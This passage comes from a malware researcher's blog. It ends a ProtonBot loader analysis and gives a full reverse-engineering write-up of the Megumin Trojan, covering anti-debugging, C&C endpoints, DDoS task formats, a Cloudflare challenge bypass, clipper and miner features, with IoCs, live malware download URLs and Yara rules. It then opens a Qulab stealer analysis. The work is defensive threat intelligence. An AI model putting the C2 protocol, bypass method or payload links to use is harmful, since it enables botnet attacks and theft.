    PVOID pvParam  -> %ImagePath%
    UINT  fWinIni  -> 1
);
I can't clearly see the point of this on my side, but it has surely been developed for a reason. Maybe I will get the explanation in the future; if you have an idea, feel free to share your thoughts about it.
Example in the wild
A few days ago, a ProtonBot C&C (187.ip-54-36-162.eu) was quite noisy in spreading malware, with around 5000 bots counted. That's enough to suggest that some actors have already started doing business with it.
Notable malware hosted and/or pushed by this Proton Bot
- Qulab
- ProtonBot
- CoinMiners
- C# RATs
Another thing to notice is that the domain itself was also hosting other payloads not directly linked to the loader, and one sample was also spotted on another domain & loader service (Prostoloader). It's common nowadays to see threat actors paying for multiple services to spread their payloads and maximize profits.
All of them are accessible on the malware tracker.
[*] Yellow means duplicate hashes in the database.
IoC
Proton Bot
- 187.ip-54-36-162.eu/cmdd.exe
- 9af4eaa0142de8951b232b790f6b8a824103ec68de703b3616c3789d70a5616f
Payloads from Proton Bot C2
Urls
- 187.ip-54-36-162.eu/uploads/0et5opyrs1.exe
- 187.ip-54-36-162.eu/uploads/878gzwvyd6.exe
- 187.ip-54-36-162.eu/uploads/8yxt7fd01z.exe
- 187.ip-54-36-162.eu/uploads/9xj0yw51k5.exe
- 187.ip-54-36-162.eu/uploads/lc9rsy6kjj.exe
- 187.ip-54-36-162.eu/uploads/m3gc4bkhag.exe
- 187.ip-54-36-162.eu/uploads/me0zam1czo.exe
- 187.ip-54-36-162.eu/uploads/Project1.exe
- 187.ip-54-36-162.eu/uploads/qisny26ct9.exe
- 187.ip-54-36-162.eu/uploads/r5qixa9mab.exe
- 187.ip-54-36-162.eu/uploads/rov08vxcqg.exe
- 187.ip-54-36-162.eu/uploads/ud1lhw2cof.exe
- 187.ip-54-36-162.eu/uploads/v6z98xkf8w.exe
- 187.ip-54-36-162.eu/uploads/vww6bixc3p.exe
- 187.ip-54-36-162.eu/uploads/w1qpe0tkat.exe
Hashes
- 349c036cbe5b965dd6ec94ab2c31a3572ec031eba5ea9b52de3d229abc8cf0d1
- 42c25d523e4402f7c188222faba134c5eea255e666ecf904559be399a9a9830e
- 5de740006b3f3afc907161930a17c25eb7620df54cff55f8d1ade97f1e4cb8f9
- 6a51154c6b38f5d1d5dd729d0060fa4fe0d37f2999cb3c4830d45d5ac70b4491
- 77a35c9de663771eb2aef97eb8ddc3275fa206b5fd9256acd2ade643d8afabab
- 7d2ccf66e80c45f4a17ef4ac0355f5b40f1d8c2d24cb57a930e3dd5d35bf52b0
- aeab96a01e02519b5fac0bc3e9e2b1fb3a00314f33518d8c962473938d48c01a
- ba2b781272f88634ba72262d32ac1b6f953cb14ccc37dc3bfb48dcef76389814
- bb68cd1d7a71744d95b0bee1b371f959b84fa25d2139493dc15650f46b62336c
- c2a3d13c9cba5e953ac83c6c3fe6fd74018d395be0311493fdd28f3bab2616d9
- cbb8e8624c945751736f63fa1118032c47ec4b99a6dd03453db880a0ffd1893f
- cd5bffc6c2b84329dbf1d20787b920e5adcf766e98cea16f2d87cd45933be856
- d3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf
- d3f3a3b4e8df7f3e910b5855087f9c280986f27f4fdf54bf8b7c777dffab5ebf
- e1d8a09c66496e5b520950a9bd5d3a238c33c2de8089703084fcf4896c4149f0
Domains
- 187.ip-54-36-162.eu
PDB
- E:\PROTON\Release\build.pdb
Wallets
- 3HAQSB4X385HTyYeAPe3BZK9yJsddmDx6A
- XbQXtXndTXZkDfb7KD6TcHB59uGCitNSLz
- LTwSJ4zE56vZhhFcYvpzmWZRSQBE7oMSUQ
- t1bChFvRuKvwxFDkkm6r4xiASBiBBZ24L6h
- 1Da45bJx1kLL6G6Pud2uRu1RDCRAX3ZmAN
- 0xf7dd0fc161361363d79a3a450a2844f2a70907c6
- D917yfzSoe7j2es8L3iDd3sRRxRtv7NWk8
Threat Actor
- Glad0ff (Main)
- ProtonSellet (Seller)
Yara
rule ProtonBot : ProtonBot {
    meta:
        description = "Detecting ProtonBot v1"
        author = "Fumik0_"
        date = "2019-05-24"
    strings:
        $mz = {4D 5A}
        $s1 = "proton bot" wide ascii
        $s2 = "Build.pdb" wide ascii
        $s3 = "ktmw32.dll" wide ascii
        $s4 = "json.hpp" wide ascii
    condition:
        $mz at 0 and (all of ($s*))
}
Conclusion
Young malware means fresh content, and with time and luck it could have an impact on the malware landscape. This loader is cheap and will probably attract some customers (if it has not already), since a lower cost helps maximize profits during attacks. ProtonBot is not a sophisticated piece of malware, but it does its job, with extra modules that probably make it more attractive. Let's see how it evolves over time; given the odd cases where plenty of different malware was pushed by this one, that could be one scenario among others that we see in the future.
On my side, it's time to chill a little.
Special Thanks: S!ri & Snemes
Let's nuke Megumin Trojan
When you are a big fan of the Konosuba franchise, you get a bit curious when you spot a malware called "Megumin Trojan" (written in C++) on some selling forums and in some sandbox submission results. Before anyone speculates about when this malware appeared: it is not recent, and some elements prove it has been on the market since the beginning of 2018.
Over the last few days, there has been increased activity related to a new version that was probably launched not so long ago (a v2). The community has started to talk about it, but many confuse it with Vidar because it uses the same boundary beacon string. This analysis should clarify how to spot Megumin Trojan and how it works. It has a specific signature that you cannot miss when you dig into it (for both network activity and code).
This malware is a Trojan with a bunch of features:
- DDoS
- Miner
- Clipper
- Loader
- Executing DOS commands on bots
- Uploading specific files from bots to C&C
It's time to reverse all of that a little.
Anti-Analysis Techniques
The classy PEB
This malware uses one of the most classic tricks to detect whether the process is being debugged: checking a specific field in the Process Environment Block (PEB). For those unfamiliar with it, the PEB is a structure that contains process-wide information.
typedef struct _PEB {
    BYTE Reserved1[2];
    BYTE BeingDebugged;   // HERE
    ...< Other fields >...
    PVOID Reserved12[1];
    ULONG SessionId;
} PEB, *PPEB;
In our case, the "BeingDebugged" value is "obviously" the one being checked. But what does it look like when reversing it? It looks like this:
- fs:[18] is where the address of the Thread Environment Block (TEB) is located
- ds:[eax+30] gives access to the PEB, whose pointer is stored in the TEB
- ds:[eax+2] retrieves the value PEB.BeingDebugged
This check is used multiple times during the execution of Megumin Trojan.
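To make the offsets concrete, here is a minimal Python sketch of what an analyst could do with a raw dump of a 32-bit PEB. It is not the malware's code: the helper name and the two sample buffers are made up for illustration, and only the offset (+2) comes from the disassembly described above.

```python
import struct

# Offset taken from the disassembly above: [peb+2] holds BeingDebugged.
PEB_BEING_DEBUGGED_OFFSET = 0x02


def being_debugged(peb_bytes: bytes) -> bool:
    """Return True if the BeingDebugged byte of a raw PEB dump is non-zero."""
    if len(peb_bytes) <= PEB_BEING_DEBUGGED_OFFSET:
        raise ValueError("PEB dump is too short to contain BeingDebugged")
    (flag,) = struct.unpack_from("<B", peb_bytes, PEB_BEING_DEBUGGED_OFFSET)
    return flag != 0


# Hypothetical first bytes of a PEB: Reserved1[2], BeingDebugged, one more byte.
clean_peb = bytes([0x00, 0x00, 0x00, 0x00])
debugged_peb = bytes([0x00, 0x00, 0x01, 0x00])

print(being_debugged(clean_peb), being_debugged(debugged_peb))
```

Patching that single byte back to 0 in a debugger is the usual way to get past this kind of check.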
Window Title
The other trick used here is to get the title of a window and compare it with a list of strings. To achieve this, the malware first calls GetForegroundWindow to get the window currently in use, then grabs its title with the help of GetWindowTextA.
The comparison is done step by step: each XOR-encrypted string is first decrypted, then compared with the window title, and the function continues until every value has been checked.
The complete string list:
- OllyDbg
- IDA
- ImmunityDebugger
- inDb (matches WinDbg)
- LordP (matches LordPE)
- ireshark (matches Wireshark)
- HTTP Analyzer
This technique cannot work completely, because it only checks the title of the window currently in use, so some strings will never match at all. When I was reversing it, I didn't understand why it was done like this. Maybe it was done in a hurry, or there is another unrelated explanation, and we will never know.
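The check described above can be modeled in a few lines of Python. This is only a sketch under assumptions: the single-byte XOR key (0x5A) is invented, and substring matching is my guess based on the truncated strings ("inDb", "ireshark"); the sample's real key and comparison routine are not shown here.

```python
KEY = 0x5A  # hypothetical single-byte XOR key, NOT taken from the sample

# Strings from the list above.
PLAIN_STRINGS = [
    "OllyDbg", "IDA", "ImmunityDebugger", "inDb",
    "LordP", "ireshark", "HTTP Analyzer",
]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same key (encoding and decoding are identical)."""
    return bytes(b ^ key for b in data)


# What the binary would embed: the strings in their XOR-encoded form.
ENCODED_STRINGS = [xor_bytes(s.encode("ascii"), KEY) for s in PLAIN_STRINGS]


def title_is_flagged(window_title: str) -> bool:
    """Decode each string in turn and look for it inside the window title."""
    for blob in ENCODED_STRINGS:
        needle = xor_bytes(blob, KEY).decode("ascii")
        if needle in window_title:
            return True
    return False


print(title_is_flagged("The Wireshark Network Analyzer"))
```

With substring matching, a truncated entry such as "inDb" still catches "WinDbg", which would explain why the first letter is missing in several entries.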
Dynamic Process Blacklist
When the malware is fully configured, it performs an HTTP POST request to /blacklist. The response contains a list of processes that the attacker wants to kill whenever the payload is active; the content is base64 encoded.
When processes are flagged as blacklisted, they are stored in variables as process handles, then checked and killed by a simple comparison. To terminate them, the ZwTerminateProcess API call (NtTerminateProcess if you are looking at it in a disassembler) is used. Once the task is done, the value in memory is reset to -1, and the loop continues again and again to make sure these processes can never stay active while the malware is up.
By default, all values are set to -1 (0xFFFFFFFF).
Network interactions list
Megumin is quite noisy in terms of interactions between bots and the C&C, and the number of API requests is higher than usual compared to the other malware that I have analyzed. To keep this as simple and understandable as possible, I classified them into three categories.
General commands
/suicide | Killing request |
/config | Malware config |
/msgbox | Fake message prompt window |
/isClipper | is Clipper activated |
/isUSB | Is set up to spread itself on removable drives |
/blacklist | Process blacklist |
/wallets | Wallet config for the clipper part |
/selfDel | Removing the payload of the original PE |
Bot commands
/addbot?hwid= | Add a new bot to the C&C (*) |
/task?hwid= | Ask for a task |
/completed?hwid= | Tell the C&C that task has been done |
/gate?hwid= | Gate for uploading/stealing specific files from bot to C&C |
/reconnecttime | Amount of time for next request between bot and C&C |
(*) Only when the User-Agent is strictly configured as "Megumin/2.0"
Miner commands
/cpu | CPU Miner configuration |
/gpuAMD | GPU AMD Miner Configuration |
/gpuNVIDIA | GPU NVIDIA Miner Configuration |
As a reminder, all responses from the server are encoded in base64, with the sole exception of /config, which is sent in clear text.
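When going through captured traffic, a small helper like the following can apply that rule. It is a sketch for analysts, not code from the malware; the function name and the sample response body are made up.

```python
import base64

# Per the note above, /config is the only endpoint answered in clear text.
CLEAR_TEXT_ENDPOINTS = {"/config"}


def decode_response(endpoint: str, body: bytes) -> str:
    """Return a readable version of a C&C response captured for `endpoint`."""
    path = endpoint.split("?", 1)[0]  # drop "?hwid=..." style parameters
    if path in CLEAR_TEXT_ENDPOINTS:
        return body.decode("utf-8", errors="replace")
    return base64.b64decode(body).decode("utf-8", errors="replace")


# Made-up response body, only to show the call.
sample_body = base64.b64encode(b"taskmgr.exe")
print(decode_response("/blacklist", sample_body))
```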
Curiosity: This malware is also using the same boundary beacon as Vidar and some other malware.
That "messy" setup
This trojan is quite curious in how it deploys itself. The first time I tried to understand the mess, I was like, seriously, what the heck is wrong with the logic of this malware? After that, I thought it was the only weird thing about Megumin, but no. To complicate the setup further, interactions with the C&C differ between stages.
To explain everything, I decided to split it into multiple steps, so the chronological order can be understood gradually.
Step 1
- In the first request, the malware downloads a payload named "reserv.exe". If this file is not empty, it means the current payload is not the main build of the malware. reserv.exe is downloaded and saved into a specific hidden folder in %PROGRAMDATA% named "{MACHINE_GUID}" (for example {656a1cdc-0ae0-40d0-a8bb-fdbd603c3b13}), and the file is eventually renamed "update.exe".
- Then two or three requests are performed:
- /suicide
- /msgbox
- /selfDel (optional)
- A scheduled task is created for persistence with the specific name pattern below, the name of the payload being "update.exe", along with another persistence entry in the registry.
- "Scheduled Updater - {*MACHINE_GUID*}"
- Then the payload is killed and removed
Reminder: If the malware was not fast enough to download reserv.exe for whatever reason, the payload is named after a random Windows process and repeats the process over and over until it grabs reserv.exe.
Curiosity: The way this malware creates a folder in PROGRAMDATA is strictly the same as in Arkei, Baldr, Rarog & Supreme++ (Rarog fork).
Megumin
Arkei
Rarog
Step 2
- reserv.exe is downloaded again, and this time the file is empty, which means the current payload is the correct build for communicating with the C&C.
- These requests are performed:
- /suicide
- /msgBox
- /config
The config is the only request for which the server does not encode the response in base64. There are 4 possible options.
Option 1 | USB task (Spreading the build on removable drives) |
Option 2 | Clipper |
Option 3 | ??? |
Option 4 | ??? |
- A scheduled task is created for persistence with the specific name pattern below. This time, the payload is named after a random, known legitimate Windows process (same thing in the registry).
- "Scheduled Updater - {*MACHINE_GUID*}"
- Then the payload is killed and removed
If this file is empty, the payload is considered to have reached its final destination and its final C&C, so seeing two Megumin C&Cs on the same domain could be explained by this (and it was the case on my side).
Step 3
- reserv.exe is always checked to see if there is a new build
- Now the behavior on the network is totally new. The bot is way more talkative and is going to be fully set up and registered with the C&C.
- /suicide
- /config
- /addbot?hwid=...&... # Registration
- /blacklist
- /wallets
- /task?hwid=... # Performs a task
- ... a lot of possible tasks (explained below)
- /completed?hwid=... # Alerting that the task is done
- /reconnecttime
For the addbot part, the registration requires specific fields, all of which are encoded in base64.
- Machine GUID
- Platform
- Windows version
- CPU Name
- GPU Name
- Antivirus
- Filename (name of the megumin payload)
- Username
example of request (Any.Run)
Step 4
- reserv.exe is always checked to see if there is a new build
- If the bot is run after the registration, this request pattern can be observed
- /suicide
- /config
- /task?hwid=... # Performs a task
- ... a lot of possible tasks (explained below)
- /completed?hwid=... # Alerting that the task is done
- /reconnecttime
Fake messages
As shown above, the malware also has a feature to display a fake window. This can be used to build "some realistic scenario" around typical fake software, cracks, or other crapware, luring the user into believing that the software has been installed or that an error occurred during the bogus installation or execution. It is really common nowadays to see fake prompts for a missing runtime DLL, a fake Fortnite hack, or whatever free Bitcoin generator trap. This kind of lure will always work on some people, even more so on kids.
To configure the feature, the bot sends a specific HTTP POST request named "/msgbox". After the base64 response from the server is decoded, it is split into multiple variables:
- An integer value that represents the icon of the window
- A second integer value that represents the buttons that will be used
- The caption (title)
- The text that will be printed in the prompt window
The case codes and their corresponding prompt window configuration are listed below:
uType - UINT code - Icons - cases
Case Code | Value | Meaning |
1 | 0x00000020L | Question-mark message box |
2 | 0x00000030L | Warning (exclamation) message box |
3 | 0x00000040L | Information message box |
uType - UINT code - Buttons - cases
Case Code | Value | Meaning |
0 | 0x00000002L | Abort, Retry & Ignore buttons |
1 | 0x00000006L | Cancel, Try Again, Continue buttons |
2 | 0x00004000L | Help button |
3 | 0x00000000L | OK button |
4 | 0x00000001L | OK & Cancel buttons |
5 | 0x00000005L | Retry & Cancel buttons |
6 | 0x00000004L | Yes & No buttons |
7 | 0x00000003L | Yes, No & Cancel buttons |
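As a quick way to read a captured /msgbox configuration, the two tables can be turned into lookups. This is a sketch: the case codes and values come from the tables above, while combining the icon and button values with a bitwise OR is an assumption based on how the Win32 MessageBox uType parameter is normally built, not something confirmed in the sample.

```python
# Case code -> uType value, copied from the two tables above.
ICON_CASES = {1: 0x00000020, 2: 0x00000030, 3: 0x00000040}
BUTTON_CASES = {
    0: 0x00000002, 1: 0x00000006, 2: 0x00004000, 3: 0x00000000,
    4: 0x00000001, 5: 0x00000005, 6: 0x00000004, 7: 0x00000003,
}


def build_utype(icon_case: int, button_case: int) -> int:
    """Combine an icon case and a button case into a MessageBox uType value.

    Assumption: the two flags are OR-ed together, as is usual for MessageBox.
    """
    return ICON_CASES[icon_case] | BUTTON_CASES[button_case]


# Question-mark icon (case 1) with Yes & No buttons (case 6).
print(hex(build_utype(1, 6)))
```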
Clipper
Before the malware executes the main module, all the regexes that will be used to catch the wanted data are stored dynamically in memory.
Then, once the malware is fully installed, if the clipping feature is activated by the config request, another request called "/wallets" is performed. This command gives the bot the list of all wallets configured to be clipped. The content is base64 encoded.
At this point, the classic infinite loop, like in Qulab, starts and keeps running until the program is killed or crashes.
- The content of the clipboard is stored in a variable.
- Step by step, each regex is checked against the clipboard content.
- If one regex matches, the clipboard content is replaced with the one the attacker wants, and some data is sent to the C&C.
/newclip?hwid=XXX&type=XXX&copy=XXX&paste=XXX&date=XXX
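For analysts who want to predict which clipboard strings would be swapped, one iteration of that loop can be modeled on plain strings. Everything specific here is an assumption: the two regexes are generic patterns for legacy Bitcoin and Ethereum addresses, not the ones embedded in the sample, and the replacement values are placeholders.

```python
import re
from typing import Optional, Tuple

# Generic, simplified patterns (assumptions, not extracted from the malware).
PATTERNS = {
    "Bitcoin": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "Ethereum": re.compile(r"^0x[a-fA-F0-9]{40}$"),
}

# Placeholders for whatever the /wallets response would configure.
REPLACEMENTS = {
    "Bitcoin": "<configured BTC wallet>",
    "Ethereum": "<configured ETH wallet>",
}


def clip_once(clipboard: str) -> Tuple[str, Optional[str]]:
    """Return (new clipboard content, matched wallet type or None)."""
    candidate = clipboard.strip()
    for kind, pattern in PATTERNS.items():
        if pattern.match(candidate):
            return REPLACEMENTS[kind], kind
    return clipboard, None


print(clip_once("0x" + "ab" * 20))
```

The matched type is what would end up in the type= field of the /newclip request, next to the original and replaced values.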
The whole process of the clipper looks like this.
For investigation purposes, this is the complete list of wallets, software, and websites targeted by this malware.
Bitcoin | BitcoinGold | BtcCash | Ethereum |
BlackCoin | ByteCoin | EmerCoin | ReddCoin |
Peercoin | Ripple | Miota | Cardano |
Lisk | Stratis | Waves | Qtum |
Stellar | ViaCoin | Electroneum | Dash |
Doge | LiteCoin | Monero | Graft |
ZCash | Ya.money | Ya.disc | Steam |
vk.cc | QIWI |
Tasks
When the bot sends a request to the C&C, nine different tasks can be returned, and they are all formatted like this:
<name>|<command>|...
There are currently 3 main categories of tasks:
- DDoS
- Executing files
- Miscellaneous
Whenever a task is completed, the request "/completed?hwid=" is sent to the C&C. The reason is simple: task executions are counted, and when the count reaches a specific amount, the task is simply deactivated.
Let's review them!
DDoS
Socket HTTP
Task format
socket|time|threads|link
When threads need to be created to perform the DDoS tasks, the bot simply grabs the specific field and uses it as the length of a thread-creation loop, as shown below. lpStartAddress contains a reference to the specific DDoS function that the bot has to run.
When inspecting the function, we can see the Layer 7 DDoS attack, which floods the server with HTTP GET requests with the help of sockets.
When everything is configured, the send function is called to start the DDoS.
HTTP
Task format
http|time|threads|link
As explained above, the thread setup technique always remains the same; only the function address is different. The HTTP DDoS task is another Layer 7 DDoS attack that floods the server with HTTP requests using methods from the WinINet library:
It's slower than the "socket" task, but it is used when the server relies on 301 redirects.
TCP
Task format
tcp|time|threads|port|link
The TCP task is a Layer 4 DDoS attack that floods the server with TCP socket requests on a specified port.
JS Bypass
Task format
jsbypass|time|threads|link
When the website is using Cloudflare protection, the malware is also configured to use a known trick to bypass it, by obtaining a clearance cookie so that it is no longer challenged.
The idea is that when the bot reaches the website for the first time, a 503 error page redirects the attacker to a waiting page (identifiable by the string "Just a moment", as shown above). At this moment, Cloudflare is in fact sending the challenge request, so a __cfduid cookie is generated and the source code of this page is fetched by a parser implemented in the malware. It needs at least 3 parameters, 2 of which are already available:
jschl_vc | the challenge token |
pass | ??? |
The last field is jschl_answer which, as you can guess, is the answer to the challenge asked by Cloudflare. To solve it, an interpreter was also implemented to parse the JS code, catching the challenge-form value and the a.value field so that the code is interpreted with the right setup.
The process shown below is the interpreter that analyzes the challenge block by block with the help of a loop: the data is split up, each block is converted into an integer value, and the sum of all of them gives the jschl_answer value.
So at the end of the waiting page, this request is sent:
/cdn-cgi/l/chk_jschl?jschl_vc=VALUE&pass=VALUE&jschl_answer=VALUE
chk_jschl leads to the creation of the cf_clearance cookie if the answer to the challenge is correct. This cookie is proof that you are authentic and trusted by Cloudflare, so by keeping it for the next requests, the website will temporarily stop challenging the attacker.
Miscellaneous curiosities
The default values for DDoS tasks are:
Time | 180 (in seconds) |
Threads | 2500 |
Port | 42 |
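To triage captured task strings, the four DDoS formats listed above can be parsed with a small helper. This is an analyst-side sketch: the field layouts and default values come from this section, but the idea that an empty field falls back to the default is my assumption, and the sample task strings are made up.

```python
from typing import Dict

# Field layouts taken from the "Task format" lines above.
TASK_FIELDS = {
    "socket": ["time", "threads", "link"],
    "http": ["time", "threads", "link"],
    "tcp": ["time", "threads", "port", "link"],
    "jsbypass": ["time", "threads", "link"],
}

# Default values from the table above (how they are applied is assumed).
DEFAULTS = {"time": "180", "threads": "2500", "port": "42"}


def parse_ddos_task(raw: str) -> Dict[str, str]:
    """Split a pipe-delimited DDoS task string into named fields."""
    name, *values = raw.strip().split("|")
    fields = TASK_FIELDS.get(name)
    if fields is None:
        raise ValueError(f"not a known DDoS task: {name!r}")
    if len(values) != len(fields):
        raise ValueError(f"{name!r} expects {len(fields)} fields, got {len(values)}")
    task = {"name": name}
    for field, value in zip(fields, values):
        task[field] = value or DEFAULTS.get(field, "")
    return task


print(parse_ddos_task("tcp|60|100|80|example.com"))
```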
Loader
Load
Task format
load|link
Seeing a loader feature is quite common given current trends; customers who buy malware want to maximize their investment at all costs. This trojan is also configured to push payloads. There is not much to say about this. The only important element here is that the loaded payload is stored in the %PROGRAMDATA% folder under the name {MACHINE_GUID}.exe.
Load PE
Task format
loadpe|link
Contrary to the simple loader feature, this one is typically a process hollowing alternative. It only works with 32-bit payloads and uses this classic process injection trick against a legitimate process.
For some reason, the User-Agent "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" can be observed when the payload is downloaded for this specific Load PE task.
More information about process injection techniques here
Update
Task format
update|build_link
When the malware requires an update, a new build can be pushed to the bot by using this task.
Miscellaneous tasks
cmd
Task format
cmd|command
One of the miscellaneous tasks is the ability to run cmd commands on the bot. I don't have a clue why this task is needed, but if it's implemented, there is a reason for it.
Complete list available here
upload
Task format
upload|fullpath
If the attacker knows exactly what he's doing, he can steal very specific files from the bot by indicating the full path of the required one. The crafted request used to push the file to the C&C has this form:
/gate?hwid=XXX
Miner
The miner is one of the main features of the trojan. Most of the time, when analysts reverse a miner, things are really easy to spot, and the main goals are to understand the setup part and how the miner software is executed.
For future purposes, I consider this checklist relevant when reversing one:
- Is it targeting CPU, GPU or both?
- If it's GPU, are both Nvidia & AMD targeted?
- Is it generating a JSON config?
- What miner software is used?
- Are there any blacklisted countries, or specific countries targeted for mining?
- What are the pool addresses?
In this malware, both hardware types are implemented. To decide which miner software is required for the GPU part, it only checks the name of the GPU on the bot: if Nvidia or AMD is spotted in the text, a request to the C&C returns the correct setup and miner software.
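The GPU selection logic described above boils down to a substring check on the GPU name. Here is a minimal sketch of it; the endpoint names come from the miner commands table, while the case-insensitive comparison and the function name are assumptions.

```python
from typing import Optional


def gpu_miner_endpoint(gpu_name: str) -> Optional[str]:
    """Pick the miner config endpoint from the GPU name reported by the bot."""
    name = gpu_name.lower()  # assumption: the real check may be case-sensitive
    if "nvidia" in name:
        return "/gpuNVIDIA"
    if "amd" in name:
        return "/gpuAMD"
    return None  # no GPU miner config requested for other vendors


print(gpu_miner_endpoint("NVIDIA GeForce GTX 1060"))
```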
The base64 downloaded miner config contains two things:
- The link of the miner software
- The one-line config that will be executed with the downloaded payload with the help of ShellExecuteA
For some reason, the User-Agent "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" can only be observed when the miner software is downloaded for the CPU part, not for the GPU.
Server-side
Login Page
The login page is quite fancy and simple. I could be wrong with this statement, but it seems to use the same core template as Supreme++ (Rarog fork) with some tweaks.
Something interesting to notice with this C&C is that there is no password, only Google Authenticator 2FA for authentication.
Dashboard
There is not much to say about the dashboard; it's a classic stats page with these elements:
- Top Countries
- New bots infected (weekly)
- Bots Windows Chart
- Number of bots online (weekly)
- Bots CPU chart
- Bots GPU chart
- Platform chart
- AV Stats
- Current cryptocurrencies values
- Top stolen wallet by the clipper
Bots
- Bots: Current list of bots
- Tasks: Task creation & current task list
- Files: All files that have been uploaded to the C&C with the help of the "upload" task
Task setup
The tasks that I've detailed above are represented like this on the C&C. As usual, it's designed to be user-friendly for customers, who just want to configure their stuff quickly and easily so they can steal and become profitable as fast as possible.
When a task is selected, there is the usual configuration setup, with classic fields like:
- Task Name
- Max Executions routine
- If the Task must be designed for targeting only one bot
- And an interesting advanced setting tab
If we look at it, the advanced settings tab is where the C&C can target bots by:
- Specific hardware requirements
- Platform
- Countries
Countries can easily be determined on the victim machine by checking the keyboard locale (I have already explained this trick in the Vidar article) and the IP.
This means the malware could be configured to target highly specific areas.
When the task is completed, it's represented like this.
Clips
Settings
Bots
- "USB Spreading" corresponds to the /isUSB API request
- "Del exe after start" corresponds to the /selfDel API request
Clipper
The clipper tab is quite simple; it's just the configuration of all the wallets that will be clipped.
Miner
The miner tab is also quite classic: just a basic configuration of the miner config and where the payload will be downloaded from.
As usual, the process blacklist remains the same as in other miner malware. A Google search will be sufficient to know which processes are targeted the most.
MessageBox
A fancy message box configuration part with multiple possibilities.
Countries
It's also possible to ban bots from specific countries. On the bot side, the malware checks whether the country is allowed with the help of the IP and the keyboard language configuration.
In the code, these checks are easy to trace. For more explanation about how the keyboard part works, see the Vidar paper, where it is already detailed.
Panel
For some reason, it is also possible to change the username used for panel authentication; doing so requires a Google Authenticator 2FA confirmation.
Script
For further investigation of this v2, I developed a small script called "ohana", like the one for Vidar, to extract the configuration of each sample. It is already available on my GitHub repository.
IoCs
Hashes
- d15e1bc9096810fb4c954e5487d5a54f8c743cfd36ed0639a0b4cb044e04339f
- e6c447c826ae810dec6059c797aa04474dd27f84e37e61b650158449b5229469
- c70120ee9dd25640049fa2d08a76165948491e4cf236ec5ff204e927a0b14918
- d431e6f0d3851bbc5a956c5ca98ae43c3a99109b5832b5ac458b8def984357b8
- ed65610f2685f2b8c765ee2968c37dfce286ddcc31029ee6091c89505f341b97
- 89813ebf2da34d52c1b924b408d0b46d1188b38f035d22fab26b852ad6a6fc19
- 8777749af37a2fd290aad42eb87110d1ab7ccff4baa88bd130442f25578f3fe1
Domains
- 90551.prohoster.biz
- baldorclip.icu
- santaluisa.top
- megumin.top
- megumin.world
PDB
- C:\Users\Ddani\source\repos\MeguminV2\Release\MeguminV2.pdb
- C:\Users\Administrator\Desktop\MeguminV2\Release\MeguminV2.pdb
Threat Actors
- Danij (Main)
- Moongod
MITRE ATT&CK
- Execution - Command-Line Interface
- Execution - Scheduled Task
- Persistence - Scheduled Task
- Persistence - Registry Run Keys / Startup Folder
- Defense Evasion - File Deletion
- Defense Evasion - Hidden Files & Directories
- Defense Evasion - Process Hollowing
- Privilege Escalation - Scheduled Task
- Credential Access - Credentials in Files
- Collection - Clipboard Data
Yara
rule Megumin : Megumin {
    meta:
        description = "Detecting Megumin v2"
        author = "Fumik0_"
        date = "2019-05-02"
    strings:
        $mz = {4D 5A}
        $s1 = "Megumin/2.0" wide ascii
        $s2 = "/cpu" wide ascii
        $s3 = "/task?hwid=" wide ascii
        $s4 = "/gate?hwid=" wide ascii
        $s5 = "/suicide" wide ascii
    condition:
        $mz at 0 and (all of ($s*))
}
Conclusion
Megumin Trojan is not a complicated piece of malware, but among all the ones I have reversed, it is the most talkative I've analyzed, and it offers quite a number of tasks. Let's see how it evolves over time, but for now it's confirmed that there is a lot of interesting stuff to do with this one:
- in terms of analysis
- in terms of cybercrime investigation
#HappyHunting
#WeebMalware
Special Thanks: S!Ri
Photo by Jens Johnsson on Unsplash
Let's play with Qulab, an exotic malware developed in AutoIT
After some issues that kept me far away from my research, it's time to get my hands on some fun stuff again. This one is technically, and finally, my first real post of the year (the anti-VM one was a particular case).
So today, we will dig into Qulab Stealer + Clipper, another password stealer that caught my attention as an exotic one (from my point of view), because it is fully developed in AutoIT and has a really cool obfuscation technique that kept me busy for some time. The trend of malware coded in languages other than C, C++, .NET or Delphi is not new; a perfect example is the article published by Hasherezade earlier this year about a stealer developed in GoLang (which I highly recommend taking a look at).
Using AutoIT scripts in this area is normally pretty common. They are widely used as packers to evade detection or as a node in an infection chain, but a whole password stealer is another story. I could say it's a particular case because it is sold with support on the black market.
Even if, as usual, the techniques for the stealing features remain the same, it's always entertaining to see how many ways there are to achieve one simple goal. Also, the versatility of this one is what fueled my curiosity and burned all my sleep time for some reason...
Qulab is focusing on these features:
- Browser stealing
- Wallet Clipper
- FTP creds
- Discord / Telegram logs
- Steam (Session / Trade links / 2FA Authenticator by abusing a third party software)
- Telegram Bot through a proxy
- Grabber
Auto IT?
As I mentioned in the intro, Qulab is coded in AutoIT. For people who are not familiar with it or have no idea what it is, it is an automation language with a BASIC-like syntax, designed to work only on Microsoft Windows.
There are two ways to execute AutoIT scripts:
- If the script is run in the .au3 format, the AutoIT dependencies and all the libraries necessary to run it are required.
- If the script is compiled, all the libraries are added into it to avoid dependencies. This means you don't need to install AutoIT to execute the PE.
When the instructions are compiled into an executable file, it's easy to tell that we are analyzing an AutoIT script by simply checking some strings, and there are already Yara rules that confirm this is the case.
rule AutoIt
{
    meta:
        author = "_pusher_"
        date = "2016-07"
        description = "www.autoitscript.com/site/autoit/"
    strings:
        $aa0 = "AutoIt has detected the stack has become corrupt.\n\nStack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nAutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention." wide ascii nocase
        $aa1 = "AutoIt Error" wide ascii nocase
        $aa2 = "Missing right bracket ')' in expression." wide ascii nocase
        $aa3 = "Missing operator in expression." wide ascii nocase
        $aa4 = "Unbalanced brackets in expression." wide ascii nocase
        $aa5 = "Error parsing function call." wide ascii nocase
        $aa6 = ">>>AUTOIT NO CMDEXECUTE<<<" wide ascii nocase
        $aa7 = "#requireadmin" wide ascii nocase
        $aa8 = "#OnAutoItStartRegister" wide ascii nocase
        $aa9 = "#notrayicon" wide ascii nocase
        $aa10 = "Cannot parse #include" wide ascii nocase
    condition:
        5 of ($aa*)
}
